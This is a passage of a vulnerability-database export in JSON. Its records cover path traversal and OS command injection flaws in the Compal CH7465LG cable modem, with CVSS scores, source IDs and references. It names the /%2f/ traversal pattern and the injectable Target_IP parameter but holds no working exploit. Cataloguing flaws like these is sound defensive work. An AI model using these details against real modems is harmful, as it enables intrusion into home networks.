"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2019-39938",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 3.9,
"id": "CVE-2019-17224",
"impactScore": 1.4,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.3,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2019-17224",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-17224",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2019-17224",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2019-39938",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201910-1550",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-39938"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-011502"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-1550"
},
{
"db": "NVD",
"id": "CVE-2019-17224"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The web interface of the Compal Broadband CH7465LG modem (version CH7465LG-NCIP-6.12.18.25-2p6-NOSH) is vulnerable to a /%2f/ path traversal attack, which can be exploited in order to test for the existence of a file pathname outside of the web root directory. If a file exists but is not part of the product, there is a 404 error. If a file does not exist, there is a 302 redirect to index.html. Compal Broadband CH7465LG Modem contains a path traversal vulnerability.Information may be obtained. The Compal Broadband CH7465LG modem is a modem from Compal, Taiwan",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-17224"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-011502"
},
{
"db": "CNVD",
"id": "CNVD-2019-39938"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-17224",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2019-011502",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2019-39938",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201910-1550",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-39938"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-011502"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-1550"
},
{
"db": "NVD",
"id": "CVE-2019-17224"
}
]
},
"id": "VAR-201910-0452",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-39938"
}
],
"trust": 1.3777778
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-39938"
}
]
},
"last_update_date": "2024-11-23T23:11:42.724000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.icbn.com.tw/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-011502"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-22",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-011502"
},
{
"db": "NVD",
"id": "CVE-2019-17224"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.0,
"url": "https://vulnerabilities.home.blog/2019/10/27/again-a-vunerability-in-cable-router-ch7465lg-cve-2019-17224/"
},
{
"trust": 2.2,
"url": "https://www.search-lab.hu/media/compal_ch7465lg_evaluation_report_1.1.pdf"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17224"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-17224"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-39938"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-011502"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-1550"
},
{
"db": "NVD",
"id": "CVE-2019-17224"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-39938"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-011502"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-1550"
},
{
"db": "NVD",
"id": "CVE-2019-17224"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-11-11T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-39938"
},
{
"date": "2019-11-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-011502"
},
{
"date": "2019-10-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201910-1550"
},
{
"date": "2019-10-28T15:15:14.240000",
"db": "NVD",
"id": "CVE-2019-17224"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-11-11T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-39938"
},
{
"date": "2019-11-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-011502"
},
{
"date": "2019-11-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201910-1550"
},
{
"date": "2024-11-21T04:31:53.877000",
"db": "NVD",
"id": "CVE-2019-17224"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201910-1550"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Compal Broadband CH7465LG Modem Path Traversal Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-39938"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-011502"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-1550"
}
],
"trust": 2.0
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "path traversal",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201910-1550"
}
],
"trust": 0.6
}
}
VAR-201910-0650
Vulnerability from variot - Updated: 2024-11-23 23:01
Compal CH7465LG CH7465LG-NCIP-6.12.18.24-5p8-NOSH devices have Incorrect Access Control because of Improper Input Validation. An attacker can send a maliciously modified HTTP POST request containing shell commands to a backend API endpoint of the cable modem, and the commands will be executed on the device. The Compal CH7465LG device contains an input validation vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). Compal CH7465LG is a wireless router manufactured by Compal Computer Industries (Compal) in Taiwan, China.
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201910-0650",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ch7465lg",
"scope": "eq",
"trust": 1.0,
"vendor": "compal",
"version": "ch7465lg-ncip-6.12.18.24-5p8-nosh"
},
{
"model": "ch7465lg",
"scope": "eq",
"trust": 0.8,
"vendor": "compal broadband",
"version": "ch7465lg-ncip-6.12.18.24-5p8-nosh"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-010361"
},
{
"db": "NVD",
"id": "CVE-2019-13025"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:compal_broadband_networks:ch7465lg_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-010361"
}
]
},
"cve": "CVE-2019-13025",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2019-13025",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-144830",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2019-13025",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-13025",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-13025",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2019-13025",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNNVD",
"id": "CNNVD-201910-137",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-144830",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-144830"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010361"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-137"
},
{
"db": "NVD",
"id": "CVE-2019-13025"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Compal CH7465LG CH7465LG-NCIP-6.12.18.24-5p8-NOSH devices have Incorrect Access Control because of Improper Input Validation. The attacker can send a maliciously modified POST (HTTP) request containing shell commands, which will be executed on the device, to an backend API endpoint of the cable modem. Compal CH7465LG The device contains an input validation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Compal CH7465LG is a wireless router manufactured by Compal Computer Industries (Compal) in Taiwan, China",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-13025"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010361"
},
{
"db": "VULHUB",
"id": "VHN-144830"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-13025",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010361",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201910-137",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-144830",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-144830"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010361"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-137"
},
{
"db": "NVD",
"id": "CVE-2019-13025"
}
]
},
"id": "VAR-201910-0650",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-144830"
}
],
"trust": 0.6555556
},
"last_update_date": "2024-11-23T23:01:40.290000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.icbn.com.tw/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-010361"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-669",
"trust": 1.1
},
{
"problemtype": "CWE-78",
"trust": 1.1
},
{
"problemtype": "CWE-20",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-144830"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010361"
},
{
"db": "NVD",
"id": "CVE-2019-13025"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://xitan.me/posts/connect-box-ch7465lg-rce/"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13025"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-13025"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-144830"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010361"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-137"
},
{
"db": "NVD",
"id": "CVE-2019-13025"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-144830"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010361"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-137"
},
{
"db": "NVD",
"id": "CVE-2019-13025"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-10-02T00:00:00",
"db": "VULHUB",
"id": "VHN-144830"
},
{
"date": "2019-10-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-010361"
},
{
"date": "2019-10-02T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201910-137"
},
{
"date": "2019-10-02T15:15:10.357000",
"db": "NVD",
"id": "CVE-2019-13025"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-08-24T00:00:00",
"db": "VULHUB",
"id": "VHN-144830"
},
{
"date": "2019-10-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-010361"
},
{
"date": "2020-08-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201910-137"
},
{
"date": "2024-11-21T04:24:03.430000",
"db": "NVD",
"id": "CVE-2019-13025"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201910-137"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Compal CH7465LG Vulnerability related to input validation on devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-010361"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201910-137"
}
],
"trust": 0.6
}
}
VAR-201910-0684
Vulnerability from variot - Updated: 2024-11-23 22:11
The setter.xml component of the Common Gateway Interface on Compal CH7465LG 6.12.18.25-2p4 devices does not properly validate ping command arguments, which allows remote authenticated users to execute OS commands as root via shell metacharacters in the Target_IP parameter. The Compal CH7465LG device contains an OS command injection vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). Compal CH7465LG is a wireless router from Compal Computer Industry (Compal) of Taiwan, China. A remote attacker could use shell metacharacters in the 'Target_IP' parameter to exploit this vulnerability and execute operating system commands.
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201910-0684",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ch7465lg",
"scope": "eq",
"trust": 1.6,
"vendor": "compal",
"version": "6.12.18.25-2p4"
},
{
"model": "ch7465lg",
"scope": "eq",
"trust": 0.8,
"vendor": "compal broadband",
"version": "6.12.18.25-2p4"
},
{
"model": "ch7465lg 6.12.18.25-2p4",
"scope": null,
"trust": 0.6,
"vendor": "compal",
"version": null
},
{
"model": "ch7465lg",
"scope": "eq",
"trust": 0.6,
"vendor": "compal",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-36912"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010913"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-724"
},
{
"db": "NVD",
"id": "CVE-2019-17499"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:compal_broadband_networks:ch7465lg_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-010913"
}
]
},
"cve": "CVE-2019-17499",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CVE-2019-17499",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CNVD-2019-36912",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2019-17499",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-17499",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-17499",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2019-17499",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2019-36912",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201910-724",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-36912"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010913"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-724"
},
{
"db": "NVD",
"id": "CVE-2019-17499"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The setter.xml component of the Common Gateway Interface on Compal CH7465LG 6.12.18.25-2p4 devices does not properly validate ping command arguments, which allows remote authenticated users to execute OS commands as root via shell metacharacters in the Target_IP parameter. Compal CH7465LG devices contain an OS command injection vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). Compal CH7465LG is a wireless router from Compal Computer Industry (Compal) of Taiwan, China. A remote attacker could use shell metacharacters in the \u0027Target_IP\u0027 parameter to exploit this vulnerability and execute operating system commands.",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-17499"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010913"
},
{
"db": "CNVD",
"id": "CNVD-2019-36912"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
